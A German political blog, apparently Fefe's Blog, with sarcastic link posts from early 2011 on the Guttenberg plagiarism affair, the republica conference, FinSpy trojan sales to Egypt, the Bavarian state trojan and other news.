"Meine Bekannte aus Deutschland hat mir erzählt, wie groß dort die Anti-Atomkraft Bewegung ist. Deshalb muss ich als Mutter doch auch teilnehmen. Sonst ändert sich ja nie etwas", erzählt Yoko Shibuya und nimmt ihrem kleinen Sohn an die Hand. Sie schimpft auf die japanischen Medien, die zu wenig über die Gefahren von Kernenergie berichtet hätten. Notfalls müsse sie nach Deutschland auswandern, sagt sie und marschiert vorbei an den Polizisten vor der Tepco-Zentrale.
Harharhar
[l] Da hat offenbar tatsächlich eine Firma das Monitoring von Patienten mit Herzproblemen über die Amazon-Cloud gemacht. OMG! Denkt da überhaupt niemand mehr vor dem Handeln nach?! Glauben die ernsthaft, Amazon steht dann gerade, wenn ihnen die Patienten während eines Cloud-Ausfalls sterben?

Sat Apr 23 2011

[l] WTF? Jetzt wird man sogar schon abgemahnt, wenn man Debian aus dem Torrent zieht.
Update: Die Abmahnung hat sich wohl als Fälschung herausgestellt. (Danke, Thomas)

Sat Apr 16 2011

[l] Oh Mann, was da gerade alles im Netz rumbrodelt. Ich wollte ja zu republica nichts mehr sagen, weil ich fand, dass ich 2009 schon alles gesagt habe. Aber so ein bisschen irritiert bin ich ja doch plötzlich, dass Markus da plötzlich aus dem Nichts einen Lobbyverein herbeizaubert, der dann auch noch Vertretungsansprüche für "das Internet" erhebt. Inhaltlich erscheint mir das Programm der republica dieses Jahr weniger schlimm als 2009. Klar, man könnte sich jetzt darüber amüsieren, dass sie jemanden wie Sandro Gaycken über Cyberwar reden lassen, aber die haben ja auch gar nicht den Anspruch, eine technische Konferenz zu sein. Und hey, wir reden hier von einer Veranstaltung, die mspr0 über Kontrollverlust vortragen lässt, und wo ein Bundeswehr-PR-Mensch zusammen mit jemandem vom "Focus" einen Stuxnet-Vortrag halten darf. Dazu und zu dem ganzen "Social Networking" Geblubber, den über Feminismus vortragenden Frauen, dem ewig gleich klingenden Privatsphäre-Geschwurbel und dem Webdesign-Track passt das ja auch ganz gut.
Ich sollte der Vollständigkeit halber dazu sagen, dass ich nicht da war. Ich war nicht eingeladen :-)
Aber ich wollte ja nicht über republica schreiben sondern über diesen neuen Lobbyclub, die "Digitale Gesellschaft". Daran fällt mir erst mal auf, dass der Name schon vergeben ist, und zwar ausgerechnet von einem gruseligen Politik-Großindustrie-Kuschelverein mit so Leuten wie dem Geschäftsführer von Intel und dem Vorstandsvorsitzenden von Alcatel-Lucent im Vorstand. Ernsthaft? Einen besseren Namen habt ihr nicht gefunden?
Aber gut, Namen sind Schall und Rauch. Die Ziele erscheinen mir erstmal ehrenhaft, aber wenn ich mir diese Webseite anschaue, kann ich nur mit Mühe den Tab-Sofort-Schließen-Reflex unterdrücken. Das sieht aus wie von einer Werbeagentur gemacht, Form over Function. Und diese Augenkrebs-Farben, insbesondere das Fukushima-Grün, das geht ja mal gar nicht. Die Kollegen von fixmbr halten den ganzen Laden gleich vollständig für ein Grünen-Uboot. Dem kann ich noch nicht aus dem Stand zustimmen, aber der Beigeschmack ist da, das finde ich auch. Der Markus hat halt eine Vergangenheit mit den Grünen, und das lastet so ein bisschen auf ihm und seiner Arbeit. Ich persönlich bin ja kein Freund der Grünen, seit die die Atomkraftwerke nicht abgeschaltet, Hartz IV mitgetragen und den ersten Angriffskrieg der Bundesrepublik Deutschland geführt haben.
Aber ich finde nicht, dass man Markus deshalb für alle Zeit abschreiben muss, Menschen können sich auch mal irren und verdienen dann eine zweite Chance. Ich habe mich z.B. in Sascha Lobo echt geirrt, habe ich in letzter Zeit festgestellt. Den habe ich lange für einen Marketing-Popanz gehalten, der da Aufmerksamkeit um jeden Preis wollte, aber wenn man mal hinhört, was der in letzter Zeit so in Talkshows gesagt und in seiner Spiegel-Kolumne geschrieben hat, das war gut. Insofern würde ich auch jetzt nicht Markus oder seinen Verein wegen Markus Grünen-Vergangenheit ablehnen wollen. An ihren Taten soll man sie messen. Und Markus tut gute Dinge.
Ob dieser Verein auch gute Dinge tut, das werden wir sehen. Bislang gibt es da hauptsächlich eine eher belanglose Pressemitteilung, einen Spendenaufruf und eine Obama-Style "gebt uns eure persönlichen Daten und helft mit" Seite. Das finde ich ein bisschen dünn. Nicht allgemein, wenn man gerade frisch anfängt, dann hat man halt noch nicht viel, aber wenn man so frisch anfängt, dass man den Vorlauf komplett geheim hält und dann als "wir haben da mal nen Lobbyverein gegründet" an die Öffentlichkeit tritt, dann muss man da schon ein bisschen mehr am Start haben finde ich.
Die Vorwürfe der Top-Down-Organisation sind auch nicht von der Hand zu weisen. Ich habe ja seit Jahren beim CCC mitgemacht und kann nicht leugnen, mir da ein bisschen auf die Füße getreten zu fühlen, wenn da jetzt so aus dem Nichts ein Verein kommt und die Lobby für die Netzpolitik monopolisieren will (so kommt das natürlich gerade bei den ganzen anderen Playern in der Internet-Lobby an). Unsere bisher größten Erfolge haben wir (die Internet-Lobby, nicht der CCC) in Arbeitskreisen wie AK Zensur und AK Vorrat gehabt, nicht in Einzelgängen. Aus meiner Sicht hätte man hier ansetzen sollen und nicht eine neue Volksfront Judäas gründen sollen.
Naja, wir werden sehen. So richtig begeistern kann mich das bisher jedenfalls nicht.
Update: Die Sponsorenliste der republica fand ich übrigens so furchtbar, dass ich froh bin, dass der CCC da sehr vorsichtig agiert immer.
Update: Um nicht nur negativ zu sein: ich glaube, dass es gerade nicht an den Leuten krankt, sondern an der Herangehensweise. Wir reagieren zu viel und agieren zu wenig. Wir müssen selber die Agenda setzen, und nicht nur immer Winterschlaf halten, bis mal wieder jemand von der Union einen der alten Zombie-Gesetzesvorschläge aus der Gruft holt.
Update: Für die Horizonterweiterung sei auch auf Don Alphonsos Meinung verlinkt.
Bevor ich eine Lobby aus Rektalakrobaten der Werbe- und Politikdevotion brauche, höre ich lieber mit dem Bloggen auf. Ausserdem sieht der Beckedahl nicht so aus, als würde er gute Schuhe tragen.
Update: Sascha Lobos rp11-Vortrag ist als Video online. Die ersten Minuten sind 1a Publikumsbeschimpfung.
[l] Wer gedacht hat, dass jetzt mit der Umstellung der Gebühren das einfach vom Finanzamt gemacht werden kann und dieser überflüssige, abstoßende, stinkende, von niemandem gewollte Bürokratiekropf GEZ mal endlich abgeschafft wird, der sieht sich getäuscht. Die expandieren sogar noch. Na das war ja mal wieder eine tolle "Reform".
[l] Das Rote Kreuz hat in Amerika mal eine Umfrage gemacht. Dabei kam raus, dass nur jedem fünften befragten Jugendlichen die Genfer Konventionen ein Begriff waren, und dass 59% der Jugendlichen finden, es gäbe Fälle, in denen Folter gerechtfertigt sei. Spannenderweise fanden 41% auch die Umkehr davon, dass es akzeptabel ist, wenn Feinde US-Kriegsgefangene foltern. Und zu guter letzt fanden 56%, dass es manchmal gerechtfertigt ist, feindliche Gefangene als Rache dafür zu töten, dass der Feind US-Gefangene getötet hat. Das sind jeweils deutlich höhere Werte als bei befragten Erwachsenen.
Ich glaube ja, dass "24" und co Schuld sind. Und ich frage mich, wie so eine Umfrage in Deutschland und anderen EU-Ländern ausgehen würde. (Danke, Rop)

Sat Apr 9 2011

[l] Vielleicht habt ihr im Internet dieses Video von der Zugbrücke in Russland gesehen, auf die jemand einen riesigen Schniedel gemalt hatte, den man dann beim Hochklappen in voller Pracht sehen konnte. Das lustige Detail an der Stelle ist, dass das genau in Richtung FSB-Hauptquartier zeigte. Und die Künstlergruppe hinter der Aktion hat dafür gerade einen Preis für zeitgenössische Kunst des Kultusministeriums gekriegt. Deren andere Aktionen klingen auch recht spaßig. Bemerkenswert an der Sache ist, dass nur eine Minderheit der Jurymitglieder dafür war, denen den Preis zu geben, aber die anderen wollten nicht wie Konformisten und Mitläufer aussehen, weil das ja doch eine regierungskritische Aktion war.

Fri Apr 8 2011

[l] Zwei Kumpels von mir haben einen schönen Frühlingsspaziergang im Mauerpark gemacht und da lief ihnen eine Delegation des de-Maiziereschen Karnevalsvereins über den Weg, und zwar nicht so ein paar verirrte Feldjäger sondern Offiziere. Was tun meine Kumpels, neugierige Hacker wie sie sind? Sie gehen da mal näher ran und spitzen die Ohren, und die redeten mit Polizisten über Konzepte für den 30.4. (im Mauerpark ist Walpurgisnacht-Party). Wir haben es hier also offenbar mit Planungen für einen Bundeswehreinsatz im Inneren zu tun. Die haben da Dinge beraten wie wo es überall Holz zum Verbrennen gäbe und was man absperren solle. Wohlgemerkt: die Polizei hat das der Bundeswehr erklärt. Wir haben es hier also nicht mit einem Technologietransfer von den Crowd Control-Abteilungen der Bundeswehr an die arme überforderte Berliner Polizei zu tun, sondern anders herum.
Wie könnt ihr helfen? Wer sich mit der Bundeswehr auskennt, könnte uns z.B. mal helfen, die Dienstabzeichen zu dekodieren. Ansonsten: Augen auf zum 1. Mai und immer schön mitfilmen.
Update: Stand bisher:
1x Oberstleutnant Heeresfliegertuppe
1x Oberstleutnant vermutlich Pioniertruppe
1x Stabshauptmann Panzeraufklärungstruppe/Feldnachrichtentruppe
1x Leutnant Fernmeldetruppe
1x Stabsunteroffizier Fernmeldetruppe
1x Soldat, Truppengattung nicht erkennbar, nur rotes Barret (der im Flecktarn)
Update: als Gegenmeinung schreibt mir gerade jemand, dass die beiden Rotmützen links wahrscheinlich zwei Generalmajore seien und keine Oberstleutnant. Davon gibt es nicht so viele, die müssten sich also sogar persönlich identifizieren lassen, wenn das stimmt.
Update: Die Mehrheit der Einsendungen widerspricht und sagt, es sind doch Oberstleutnants. Begründung: Generalmajore sind nur mit Feldjäger-Bodyguards unterwegs.

Wed Mar 30 2011

[l] Erinnert ihr euch an TARP? Das Troubled Asset Relief Program? Auch bekannt als "der Banken-Bailout"? Da gab es eine Untersuchung. Der Autor des Artikels ist der Typ, der die Untersuchung geleitet hat. Und er kommt zu dem Schluss, dass das die reichen Großbanken noch reicher und größer gemacht hat, aber den kleineren Banken und den Bürgern keine Vorteile gebracht hat.
Oh und Captain Obvious möchte noch hinzufügen, dass immer noch kein einziger dieser Banker im Knast gelandet ist.
[l] Ein Glück, dass wir keine Korruption in diesem Land haben, sonst würde dieses Gerichtsverfahren gegen drei Neffen von dem Oberunsympathen Volker Bouffier einige Augenbrauen heben. Die drei (und noch ein paar andere Männer) waren wegen schwerer Körperverletzung angeklagt, bei einer Disco-Prügelei. Und dann geschah das:
Doch nach der kurzen Verlesung der Anklage wurde das Verfahren eingestellt – auf Antrag der Staatsanwaltschaft Gießen, ohne jegliche Strafen oder Auflagen. Ein für die Täter überaus glimpfliches und schnelles Ende des Strafverfahrens, ohne Beweisaufnahme, obwohl der Prozess auf drei Verhandlungstage terminiert war.
Ich bin mir sicher, dass das NICHTS, aber auch GAR NICHTS mit der Verwandschaft zu dem Bouffier zu tun hat. Völlig undenkbar, dass eine integre Persönlichkeit wie der Bouffier hier unbotmäßigen Einfluss auf die Justiz nimmt!1!!
Update: Ach gucke mal, gibt schon ein Update. Das Gericht dementiert selbstverständlich, unter Druck gesetzt worden zu sein. Mit anderen Worten: sowas passiert bei uns auch ohne Druck von oben. Und warum haben sie jetzt das Verfahren eingestellt?
Das Strafverfahren sei noch vor der Beweisaufnahme „wegen geringer Schuld“ eingestellt worden. Dies sei eine „gemeinschaftliche Entscheidung“ der Staatsanwaltschaft, des Gerichts und der Verteidiger von Bouffiers drei Neffen gewesen. Bei einem der Neffen, der als Haupttäter angesehen wurde, sei von einer Strafe abgesehen worden, weil dieser bereits in einem anderen Verfahren zu sechs Monaten Bewährungsstrafe verurteilt worden sei und eine neue Strafe „nicht erheblich ins Gewicht fällt“, so die Sprecherin.
Äh wie bitte?
Update: Hier die Lokalpresse dazu.
Update: Ich als juristischer Laie interpretiere das mal so, dass die das Verfahren eingestellt haben, weil der Hauptschuldige eh schon das auf Bewährung ausgesetzte halbe Jahr automatisch reingedrückt kriegt jetzt und die paar Tage mehr oder weniger, die das jetzt gegeben hätte, da den Kohl auch nicht mehr fett gemacht hätten. Das mag ja sein, aber kommen die anderen 5 jetzt nicht ungestraft davon? (Danke, Stefan)

Mon Mar 28 2011

[l] Berlusconi hat sich zum ersten Mal seit 7 Jahren einem Gerichtsverfahren stellen müssen. In der Zwischenzeit hatte er ja ein Gesetz gemacht, dass ihm erlaubte, "keine Zeit" zu haben und nicht zu erscheinen. Das war dann vom höchsten Gerichtshof des Landes zerlegt worden.

Mon Mar 21 2011

[l] Spiegel Online hat sich mal den Spaß gemacht, die Werksfeuerwehren der deutschen AKWs abzutelefonieren. Wenig überraschend waren die eher … wortkarg. :-)

Fri Mar 18 2011

[l] Hier haben ein paar US-Forscher das japanische Erdbeben anhand von GPS-Verschiebungen visualisiert. Whoa!
Update: Narf, ihr habt die Site kaputtgemacht. Korrektur: das ist ein Berliner Forscher, der da gerade in den USA seinen PhD macht, kein US-Forscherteam.

Thu Mar 17 2011

[l] Im Browsermarkt wird mit harten Bandagen gekämpft, soviel ist ja bekannt, aber dass Google jetzt für Chrome eine Woche vor den anderen ein gepatches Flash ausliefert, das ist schon echt unfair. Google hat offenbar mit Adobe einen Deal gemacht und hat Zugriff auf Vorabversionen.

Sun Mar 13 2011

[l] Schaut euch mal diese BBC-Dokumentation zum Windscale-Problem an. Windscale war der erste Atomreaktor der Briten, mit dem sie für ihr Atombombenprojekt Plutonium erzeugen wollten. Das Teil ist aus den 50er Jahren, da haben sie einmal alles falsch gemacht. Graphit als Moderator, luftgekühlt, dass sie überhaupt einen Filter im Schornstein installiert haben, war gar nicht eingeplant und geht auf einen Querulanten zurück. Dieser Film ist einmal die Geschichte der Atomenergie kondensiert.
Update: Aus aktuellem Anlass sei auch nochmal "Todeszone - Nach dem Super-GAU in Biblis" von 1991 verlinkt.
Update: Ich liebe diesen britischen Humor. In der BBC-Doku sagt der eine Interviewpartner (angesichts der Tatsache, dass die Amis ihren Reaktor so wenig im Griff hatten, dass sie gleich eine 30-Meilen-Todeszone drumherum eingeplant hatten):
We decided this country was far too small to have a reactor with such dangerous possibilities built anywhere. Not even in Scotland.
:-)

Mon Mar 7 2011

[l] So, noch ein paar Updates zum Ägypten-Trojaner.
Erstens mailt mir jemand, dass das mit § 202c StGB gar nicht so einfach ist, weil schon der Satz, dass der Trojaner nur für Regierungen sei, ausreichen könnte, um den Vorsatz nicht nachweisen zu können. Der ist für die Anwendung von 202c notwendig.
Anders herum heißt das auch, dass andere Trojanerschrauber an ihre Untergrund-Webseiten auch ranschreiben könnten, das sei nur für den Export an Diktaturen im Nahen Osten und die wären dann aus dem Schneider. Solche Verrenkungen gibt es immer, wenn der Staat meint, selbst Zugriff auf offensichtlich widerliche, abstoßende Waffentechnologien haben zu müssen, während er sie den Bürger (zu Recht!) verwehrt. Daher müssen wir schauen, dass wir Trojaner generell ächten, damit auch Regierungen darauf keinen Zugriff haben.
Zu dem Streetview habe ich einige Zuschriften gekriegt. Die Streetview-Fotos sind offenbar schon etwas älter, und die Firma Elaman hat damals noch in der Seitzstraße 23 ihren Sitz gehabt. Das is wohl das verpixelte Schild in Weiß dort.
Dann haben mich diverse Leute belustigt darauf hingewiesen, dass die ihre "Sicherheits"-Produkte in den Sprachen Russisch, Arabisch, Englisch und Deutsch anbieten, und wie schön das doch passen würde.
Die KfW-Schule ist inzwischen umbenannt worden und heißt jetzt Pater-Rupert-Mayer-Gymnasium.
Hier gehen auch Mails zu dem Xing-Profil "Markus Meiler" ein, wo jemand bis 2007 für Siemens den Vertrieb in den Vereinigten Arabischen Emiraten gemacht hat und dann bei Elaman den Vertrieb übernommen hat.
Hier hat noch jemand die Gesellschafterliste rausgekramt.

Sat Mar 5 2011

[l] Die Ägypter sind erstmal in ihren Geheimdienst reingelaufen und packen die Unterlagen gescannt auf Facebook (Achtung: Link geht zu Facebook). Und was findet man da u.a.? Wer ihnen ihre Trojaner-Software ~~geliefert~~ angeboten hat. Na, ratet mal, welches Land so etwas tun würde, einem fiesen Diktator seine Trojanersoftware liefern. Na? Kommt ihr nie drauf! (Der Tinyurl-Link geht zu Amazon S3, nicht zu Facebook)
Da findet man dann ~~eine Rechnung~~ ein Angebot über Produkte namens FinSpy und FinFly. Geliefert von einer Firma namens Gamma, aber wenn man nach den Produktnamen googelt, findet man diese Produktseite bei einer deutschen Firma. Und da bleibt kein Auge trocken!
Ich frage mich ja bei sowas immer, wie solche Leute nachts ruhig schlafen können. Niemand sollte Zugriff auf solche Software haben, keine westlichen Regierungen und natürlich erst Recht keine Diktatoren.
Update: Frank hat gerade die großartige Idee, folgende Forderung an Westerwelle zu stellen: Herr Westerwelle, als Wiedergutmachung dafür, dass Ägyptens Trojanersoftware anscheinend aus Deutschland kommt, sollte Deutschland Ägypten auch Zugriff auf die Gauck-Behörden-Software zum Zusammenpuzzeln geshredderter Dokumente schenken.
Oh und bei der Gelegenheit möchte ich noch was anfügen. Trojaner und Spionagesoftware sind eine Bedrohung für Freiheit, Demokratie und Menschenrechte überall und müssen daher genau so geächtet werden wie Streubomben und Antipersonenminen. Genau wie wir Kriminellen solche Software wegnehmen und sie bestrafen, genauso müssen wir den Regierungen (insbesondere auch unserer!) solche Software wegnehmen.
Update: Frank hat auch was dazu gebloggt.
Update: Nehmt euch mal die Zeit, denen ein bisschen hinterherzugoogeln. Da findet man so Sachen wie deren Internet-Überwachungs-Angebote, Messefotos, auf denen Gamma und Elaman gemeinsam einen Stand betreiben, besonders schön auch diese Messefotos hier, komplett mit interessierten Scheichs. Und dieses PDF mit Fotos von deren Personal. Die alten Herren da sehen aus, als hätten sie schon mitgemacht, als es noch Organisation Gehlen hieß. Deren Firmenbroschüre ist auch online, mit dem schönen Slogan "The bridge to trust and security". Klar, Vertrauen und Sicherheit sind auch meine ersten Assoziationen bei Überwachungsequipment, Schnüffelhardware und Trojanern. Die offensichtliche Frage ist jetzt natürlich, ob die nur für den Export liefern oder ob die auch den Bayerntrojaner gemacht haben.
Update: Hier kommt gerade per Mail die Frage, wie eine Produkt mit der Beschreibung "infection proxy which is used to deliver intrusion software" nicht §202c verletzt. Gute Frage. Frage ich mich auch. Das sollte die Staatsanwaltschaft mal prüfen.
Update: Und hier noch ein besonders aromatisches Detail (Danke an Dominik dafür!): Streetview von dem Firmensitz von Elaman. Ich seh da kein Elaman, ist vielleicht in dem verpixelten Bereich. Was aber auffällt, ist das dicke Siemens-Schild. Da lag ich ja offensichtlich gar nicht so falsch mit der Organisation Gehlen.
Update: Wird immer lustiger. Der General Manager von Elaman heißt Holger Rumscheidt. Googelt den mal. Hier findet man einen Holger Rumscheidt, der bis 1987 auf die Realschule des Katholischen Familienwerks in Pullach ging. Und hier findet man ein Paper von einem Holger Rumscheidt von der Siemens AG, München. Alles nur Mutmaßungen, der können natürlich auch alles verschiedene Holger Rumscheidts sein. Aber es ergibt doch ein verlockendes Gesamtbild, so mit Pullach und Siemens.
Update: Mir teilt gerade ein Münchener mit, dass das KfW eine Privatschule ist, deren Einzugsbereich den gesamten Münchener Süden beinhaltet, nicht nur Pullach. Insofern kann man daraus nicht direkt schließen, dass die Familie in Pullach gewohnt hat, z.B. weil der Vater dort Arbeit gefunden hat.
Update: Das war keine Rechnung sondern ein Angebot.
Update: Mir kommt gerade zu Ohren, dass die Firma Gamma International GmbH über einen Anwalt dementieren lässt, mit den Ägyptern zusammengearbeitet zu haben. Das geht sogar soweit, dass sie sagen, kein Angebot geschickt zu haben. Das finde ich ja jetzt doch ein wenig irritierend, denn es gibt ja im Internet diesen Screenshot. Meine Vermutung ist, dass die darauf abzielen, dass das Angebot in den Unterlagen von "Gamma International UK Limited" ist, nicht von "Gamma International GmbH".
[l] Hahahaha, die Pro-Guttenberg-Demo in Berlin war ja ein NOCH größerer Reinfall für die Union als bisher angenommen. Botnet-Facebook-Accounts gehen halt nicht auf die Straße. Markus hat ein paar Fotos gemacht und berichtet von der Demo. Der Brüller: die haben es tatsächlich nicht geschafft, eine Pro-Guttenberg-Demo anzumelden. Also musste das die Hedonistische Internationale machen, und die hat sich damit natürlich das Recht erworben, die großartigste Presseerklärung aller Zeiten zu veröffentlichen. Ich zitiere mal den Teil am Anfang, da braucht man echt eine Zwerchfell-Transplantation danach.
500.000 Fans aufs Facebook – und keiner in der Lage eine Demonstration rechtmäßig anzumelden. Aufgrund dieser haltlosen Situation sah sich sich die „Monarchohedonistische Front“ der Hedonistischen Internationale gezwungen, dies als "Initiative Pro Guttenberg" selbst zu tun. Eine weitere angemeldete Pro-Guttenberg-Demonstration verzichtete daraufhin auf die Durchführung und schloss sich mit ihren erwarten 1000 Teilnehmern der Demonstration der „Initiative Pro Guttenberg“ an.
Der Anmelder Alexander Müller zeigte sich über diesen Schritt zufrieden: „Wir freuen uns sehr über die dadurch gewonnenen zusätzlichen 14 Demonstranten christdemokratischen Hintergrunds.“
BWAHAHAHAHAHAHAHAHA wie geil!
Absolut episch auch dieses Interview mit dem Anmelder der Demo. Zieht euch das Video rein, das ist der Kracher! *schenkelklopf* Diese linken Schmierblätter, FAZ und Welt und so, !1!!
Update: In München lief das nicht so gut, das übelste Bild ist aus meiner Sicht das hier, wo die Münchener Pelzmantel-Schickeria mit einem "Wir sind das Volk"-Schild rumläuft. Aber es gibt auch in München Hoffnung. Man kann ja weitgehend die, die es ernst meinen, an ihrem Alter erkennen bei sowas.
Update: Auch die Berichterstattung des ehemaligen Nachrichtenmagazins ist durchaus erheiternd.
In Leipzig machte die gehässige Presse sogar ein Foto des leeren Platzes, auf dem die Demo hätte stattfinden sollen.
Update: Oh wie schön, Henryk M. Broder war auch bei der Demo und hatte sichtlich Spaß.

Mon Feb 28 2011

[l] Es ist rausgekommen, wie sie den Bayerntrojaner installieren. Wir haben es ja schon angesagt, aber jetzt ist es offiziell: Am Flughafen, bei der "Kontrolle".
Es dauerte, doch das Gewissen des Reisenden war rein; es gab nichts zu verzollen. Nur mit seinem Computer verschwanden die Kontrolleure im Nebenraum. Kurz danach Entwarnung: alles in Ordnung. Gute Heimfahrt.
Und da haben sie ihm den Trojaner installiert. Der hat dann alle 30 Sekunden Screenshots gemacht und zum LKA geschickt.
Naja, werdet ihr jetzt vielleicht sagen, das wird halt ein gefährlicher Terrorist und Massenmörder sein. Immerhin hatten sie uns zugesagt, nur in solchen Fällen auf Trojaner zurückgreifen zu wollen. Und auf das Wort der Regierung ist schließlich Verlass!1!!
Nun, äh, nein.
Doch der betroffene kaufmännische Angestellte steht weder unter Terrorverdacht, noch wird er eines Kapitalverbrechens beschuldigt. Gegen den Landshuter läuft seit 2008 ein Ermittlungsverfahren wegen "banden- und gewerbsmäßigen Handelns und Ausfuhr von Betäubungsmitteln". Er ist in einer Firma angestellt, die Psychopharmaka vertreibt.
Die sind in Deutschland legal. Auch das noch. Ob auch im Ausland, das ist strittig. Jedenfalls geht es hier nicht um Gefahrenabwehr, sondern um ganz normale Ermittlungen zu einer mutmaßlichen Straftat.
Hände hoch, wer das kommen sah! Also ICH bin jedenfalls schockiert — SCHOCKIERT!!1!
Und da wundern die sich, dass wir ihnen nie ein Wort glauben.

Sat Feb 26 2011

[l] Soooo, komme von der Demo heim. Der erste Eindruck war erstmal, dass ich beim Weg zur Demo am Potsdamer Platz an einem weißen Bus der Bundeswehr vorbeikam. Und dann noch einer. Offensichtlich hatte der Guttenberg die Hosen gestrichen voll :-)
Die Herbeigekarrten fielen dann aber nicht sonderlich auf, weder gab es da Soldaten in Uniform noch sind mir irgendwelche Provokateure aufgefallen.
Die Teilnehmerzahl war noch dreistellig, aber wir hatten so dermaßen großartige Sprüche auf den Schildern, dass wir uns trotzdem wie die Sieger fühlen. Die Montagsdemos fingen ja auch mal klein an und auch die Loveparade waren am Anfang nur ein paar Kaputte auf dem Kudamm. Im Vorfeld hatten wir genug Aufmerksamkeit erzeugt, dass da einige Journalisten und Fotographen am Start waren. Die waren dann sichtlich überrascht, dass da keine 100.000 Protestierer waren, aber haben schöne Fotos gemacht, und am Ende hat es zu einer dpa-Meldung gereicht. Es gibt auch einige Berichte, z.B. beim Tagesspiegel. Der Rückhalt in der Bevölkerung ist jedenfalls klar auf unserer Seite, das haben wir beim Hin- und Rückweg zur Demo gehört, wo wir spontan Beifall von Passanten kriegten für die Schilder und wo wir mehrfach gefragt wurde, wo die Demo denn stattfinde, weil der Passant noch mitlaufen wollte, aber da war es dann auf dem Rückweg schon zu spät.
Wir lernen also daraus: nächstes Mal ein paar Tage früher ansagen und zu einer späteren Tageszeit machen, damit wir die potenziellen Mitdemonstranten auf dem Hinweg treffen und nicht auf dem Rückweg.
Die Sache mit den Schuhen hat gut geklappt, auch wenn ich am Anfang von einem Journalisten mit Notizblock diskret befragt wurde, was es denn damit auf sich habe. Das hat mich ja doch mitgenommen. Ich hoffe mal, dass der von Springer war und den anderen Journalisten die Symbolik vertraut ist. Ich habe dem dann erklärt, dass das eine Verbeugung vor den Revolutionären im Nahen Osten ist, wo das Zeigen der Schuhsohle eine recht starke Beleidigung ist.
Update: Hier ist eine Linksammlung.
[l] Und von DENEN soll die Welt Demokratie lernen? Überraschungs-Drei-Sekunden-Abstimmung beendet Filibuster in Wisconsin, und zwar bevor alle eine Chance zur Abstimmung hatten. Das ist alles so eine Farce. Die Demokraten ja genau so, die haben ja den Filibuster gemacht (d.h. einfach endlos über das Thema reden, damit es nie zur Abstimmung kommt).

Thu Feb 24 2011

[l] ÜBERRASCHUNG!!1! Paypal macht das Bradley-Manning-Spendenkonto zu. Also DAMIT konnte ja wohl NIEMAND rechnen!1!!
Update: Der Shitstorm war dann wohl doch zu viel, sie haben den Account wieder aufgemacht.

Fri Feb 18 2011

[l] Einer der T-Shirt-Händler, die hier Werbung geschaltet hatten, wird gerade abgemahnt. Die hatten ein STFU-T-Shirt im Angebot, wie man es auch anderswo seit vielen Jahren kaufen kann. Das hat jetzt jemand markenrechtlich schützen lassen und mahnt sie ab. Ich finde es immer wieder grotesk, mit was für Anmeldungen Leute beim Patentamt und ähnlichen Institutionen durchkommen. Das ist echt zum reinen Profit-Center verkommen, da prüft niemand mehr irgendwas. Lieber später jemand anderes ein Beschwerdeverfahren führen lassen und da auch noch mal kassieren. Wenn man bedenkt, mit was für hehren Vorstellungen Patent- und Markenschutz eingeführt wurde, und wie wenig davon heute übrig ist… seufz.
[l] Wie kommt das eigentlich, dass die ganze Law&Order-Rechtsaußen-Fraktion von der Union jetzt bei Guttenberg plötzlich Zurückhaltung und keine Vorverurteilungen fordert? Wenn das ein SPD-Minister gewesen wäre, dann wäre die Presse voll von Rücktrittsforderungen aus den Reihen der Union.
Immerhin gibt es wieder wunderbaren Internet-Humor zu der Affäre, z.B. diese Tastatur im Guttenberg-Layout auf Ebay und dieses Jobangebot, dringend eine Doktorarbeit zu überarbeiten :-)
Und für die eher anpackenden Teilnehmer gibt es hier ein Plagiats-Wiki.
Und dann gibt es da noch dieses Guttenberg-Krisenbewältigungs-Drehbuch aus den Spiegel-Foren.
Oh und einen habe ich noch. Erinnert ihr euch an X-Pire? Dieses Projekt, Bilder im Internet mit Ablaufdatum zu versehen? Das von der Hackertechnologie "Screenshot" vernichtend geschlagen wird? Das Teil? Ja? Nun, der Professor, der das gemacht hat, wurde 2009 in Capital zur Jungen Elite der Generation Guttenberg ernannt. Mit diesem tollen Zitat:
Das Institut, das Backes an der Universität des Saarlands leitet, zählt zur Exzellenzinitiative der Bundesregierung.
Da passt mal wieder alles wunderbar zusammen. (via)
Oh, und auch sehr passend gewählt erscheint der Titel eines Buches von Guttenbergs ~~Vater~~ Großvater.

Mon Feb 14 2011

[l] Ah, die Nokia-Übernahme war wohl doch nicht kostenlos für Microsoft. Nokia hat jetzt fallen lassen, dass MS ein paar Milliarden dafür locker gemacht haben soll.

Sat Feb 12 2011

[l] US-Hochschulen werden zunehmend von chinesischen Studenten besucht. Die haben da dick Marketing gemacht und jetzt kommen die Chinesen halt auch. Das Problem ist, wie man auswählt, wen man reinnimmt.
Consider, for example, that half of Grinnell’s applicants from China this year have perfect scores of 800 on the math portion of the SAT, making the performance of one largely indistinguishable from another.
Das haben sie davon, ihre US-Tests im Niveau der Dämlichkeit des High School-Systems angepasst zu haben. Dazu kommt, dass die Schulen in China weniger Bullshit-verseucht sind. Die US-Schulen bewerten, wenn sie einen schlechten Jahrgang haben, eben alle ein bisschen besser, damit es nicht so aussieht, als hätte die Schule nachgelassen. In China kriegen dann alle eine schlechte Note.
But the most accomplished applicants will have grades in the 70s or 80s, because Chinese schools tend to grade on a far less generous curve than American high schools. Few will have had the opportunity to take honors or Advanced Placement courses to demonstrate their ability to do college work, since such courses are rare in China.
Und es ist auch nicht so klar, wie gut die Englisch sprechen, weil chinesische Familien das Schreiben der Bewerbung gerne mal an Agenturen outsourcen :-)

Thu Feb 10 2011

[l] Heute hatten Frank und ich Gelegenheit, Mitchell Moss (dem Presseattaché der US-Botschaft in Berlin) ein paar Fragen zu Wikileaks zu stellen. Ich genieße das ja immer sehr, wenn jemand eine schwierige Aufgabe übernimmt und die dann so gut es eben geht professionell macht. Das war so ein Fall. Der musste ja im Grunde eine nicht zu vertretende Position vertreten, nämlich dass die USA eine rechtsstaatliche Demokratie mit Presse- und Meinungsfreiheit als hohen Gütern ist, die in anderen Ländern für Menschenrechte und Demokratie eintritt, und es rückblickend auch gut findet, dass die Pentagon Papers damals geleakt wurden, … aber auf der anderen Seite zählt Wikileaks nicht als Presse und was die da gemacht haben, das war gar nicht gut und muss verfolgt werden.
Der Mann hat die Herausforderung ausgesprochen professionell angenommen und auch tatsächlich überraschend gut gemeistert. Ich hatte mich ja schon auf eine Art Trinkspiel gefreut, für die ganzen abgedroschenen Argumente ala "das gefährdet Menschenleben" und so weiter, wir haben die Talking Points ja schon alle gehört. Aber Frank hat das Argument mit den Menschenleben schon zerhauen, bevor der arme Kerl das überhaupt aussprechen konnte, und so musste er sich darauf beschränken, die Karriere dieses FDP-Maulwurfes als Beispiel dafür heranzuziehen, dass Namennennen in solchen Leaks ja negative Auswirkungen haben kann.
